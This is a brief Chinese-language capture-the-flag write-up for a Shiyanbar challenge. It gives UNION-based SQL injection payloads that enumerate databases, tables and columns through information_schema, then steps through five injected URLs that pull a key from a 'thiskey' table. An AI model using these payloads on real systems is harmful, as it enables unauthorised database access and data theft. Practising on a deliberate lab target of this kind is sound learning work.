實驗吧這題看起來很簡單
知識點:查詢庫名:union select 1,schema_name from information_schema.schemata
查詢表名:union select 1,table_name from information_schema.tables where table_schema=‘庫名‘
查詢字段名:union select 1,column_name from information_schema.columns where table_name=‘表名‘
查詢信息:union select 1,名字 from 字段名
1.http://ctf5.shiyanbar.com/8/index.php?id=1 and 1 = 1
沒變,說明存在註入漏洞
2.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,schema_name from information_schema.schemata
3.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,table_name from information_schema.tables where table_schema=‘my_db‘
4.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,column_name from information_schema.columns where table_name=‘thiskey‘
5.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey
實驗吧這題看起來很簡單